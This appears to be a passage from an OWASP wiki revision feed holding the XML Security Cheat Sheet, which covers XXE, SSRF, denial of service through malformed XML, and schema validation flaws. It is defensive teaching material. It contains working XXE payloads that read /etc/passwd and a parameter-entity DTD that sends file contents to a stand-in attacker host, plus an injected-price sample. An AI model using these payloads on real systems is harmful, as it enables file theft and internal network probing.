  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity reference in the document body expands it inside the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow content to be retrieved through URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you receive the complete responses from the server being queried, so you have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports then becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to determine the status of a port with some confidence is to take multiple measurements of the time required to reach each port, and then compare the average time for each port. This type of attack is difficult to carry out over higher latency networks.&lt;br /&gt;
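&lt;br /&gt;
The averaging step can be sketched as follows. This Python fragment only summarizes timings that have already been collected; the function name, the threshold, and the &amp;lt;tt&amp;gt;fast&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;slow&amp;lt;/tt&amp;gt; labels are assumptions made for illustration, and which label corresponds to an open port depends on the implementation being tested.&lt;br /&gt;
```python
from statistics import mean


def classify_ports(samples: dict[int, list[float]], threshold_seconds: float) -> dict[int, str]:
    """Label each port by comparing its mean response time to a threshold."""
    labels = {}
    for port, timings in samples.items():
        # Averaging several measurements dampens the effect of network jitter.
        labels[port] = "slow" if mean(timings) > threshold_seconds else "fast"
    return labels


if __name__ == "__main__":
    measured = {80: [0.9, 1.1, 1.0], 81: [59.0, 61.0, 60.0]}
    print(classify_ports(measured, threshold_seconds=10.0))
```
The smaller the gap between the two groups, the more samples per port are needed before the averages separate reliably.&lt;br /&gt;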
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224434</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224434"/>
				<updated>2016-12-21T20:21:45Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, accept only well-formed documents and validate the contents of each element and attribute so that only valid values within predefined boundaries are processed.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
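&lt;br /&gt;
A minimal way to run that comparison is sketched below in Python, using the standard library parser as a stand-in for the parser under test. The helper names and the way the malformed variant is produced (cutting into the final closing tag) are assumptions for illustration; a real assessment would use representative documents and many repetitions.&lt;br /&gt;
```python
import time
import xml.etree.ElementTree as ET


def build_document(item_count: int) -> bytes:
    """Serialize a small well-formed document with item_count children."""
    root = ET.Element("items")
    for index in range(item_count):
        ET.SubElement(root, "item").text = str(index)
    return ET.tostring(root)


def timed_parse(data: bytes) -> tuple[bool, float]:
    """Return (parsed_ok, elapsed_seconds) for one parsing attempt."""
    start = time.perf_counter()
    try:
        ET.fromstring(data)
        parsed_ok = True
    except ET.ParseError:
        parsed_ok = False
    return parsed_ok, time.perf_counter() - start


if __name__ == "__main__":
    well_formed = build_document(10_000)
    # Cutting into the final closing tag yields a malformed variant.
    malformed = well_formed[:-5]
    for label, data in (("well-formed", well_formed), ("malformed", malformed)):
        ok, seconds = timed_parse(data)
        print(label, ok, round(seconds, 6))
```
If the malformed variant consistently takes noticeably longer than the well-formed one, the parser is a candidate for the asymmetric resource consumption attack described above.&lt;br /&gt;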
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters, even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without checking the structure, the attacker gains the ability to buy a book without actually paying for it.&lt;br /&gt;
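&lt;br /&gt;
The difference between a first-match lookup and a structural check can be sketched in Python. The tampered document is rebuilt here through the ElementTree API rather than parsed from text, and the function names are hypothetical; the sketch only assumes that the application reads the first &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element it finds.&lt;br /&gt;
```python
import xml.etree.ElementTree as ET


def build_buy(children):
    """Build a buy element from (tag, text) pairs, in document order."""
    buy = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(buy, tag).text = text
    return buy


def naive_price(buy):
    # find() returns the first matching child, so an injected price wins.
    return buy.find("price").text


def strict_price(buy):
    # Accept exactly one id followed by exactly one price, nothing else.
    tags = [child.tag for child in buy]
    if tags != ["id", "price"]:
        raise ValueError(f"unexpected structure: {tags}")
    return buy.find("price").text


# Same shape as the tampered document: id, bogus price, empty id, real price.
tampered = build_buy([("id", "123"), ("price", "0"), ("id", None), ("price", "10")])
```
Here &amp;lt;tt&amp;gt;naive_price(tampered)&amp;lt;/tt&amp;gt; returns the injected value 0, while &amp;lt;tt&amp;gt;strict_price(tampered)&amp;lt;/tt&amp;gt; raises an error. A schema that fixes the sequence of child elements enforces the same check before the application code runs.&lt;br /&gt;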
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
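&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch shows one way to do so; the policy of one to three unsigned ASCII digits and the name &amp;lt;tt&amp;gt;parse_age&amp;lt;/tt&amp;gt; are assumptions chosen for illustration.&lt;br /&gt;
```python
import re

# Assumed policy for this sketch: an age is one to three ASCII digits.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")


def parse_age(text: str) -> int:
    """Convert text to an age only after its size and characters are checked."""
    if AGE_PATTERN.fullmatch(text) is None:
        raise ValueError("age must be one to three digits")
    return int(text)
```
Checking the length and character set before converting the value means that the one-million-digit string is rejected without further processing.&lt;br /&gt;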
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to unexpected input. The result could be the disclosure of internal errors, or documents that reach the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters; a dedicated data type (&amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;) exists for that purpose. As another example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and still considered it valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was checked by application code instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, the calculation might yield a negative amount on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
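&lt;br /&gt;
The effect of the missing restriction can be sketched in Python. The function &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; is a hypothetical stand-in for the application logic; its guard mirrors what &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; would enforce at validation time.&lt;br /&gt;
```python
from decimal import Decimal


def order_total(price: Decimal, quantity: int) -> Decimal:
    """Compute price*quantity, accepting only quantities of 1 or more."""
    # Mirrors xs:positiveInteger: zero and negative values are rejected.
    if quantity >= 1:
        return price * quantity
    raise ValueError("quantity must be a positive integer")


if __name__ == "__main__":
    print(order_total(Decimal("10"), 3))
    # Without the guard, a quantity of -3 would produce a total of -30.
    print(Decimal("10") * -3)
```
Enforcing the constraint in the schema keeps the negative value from ever reaching this calculation.&lt;br /&gt;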
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
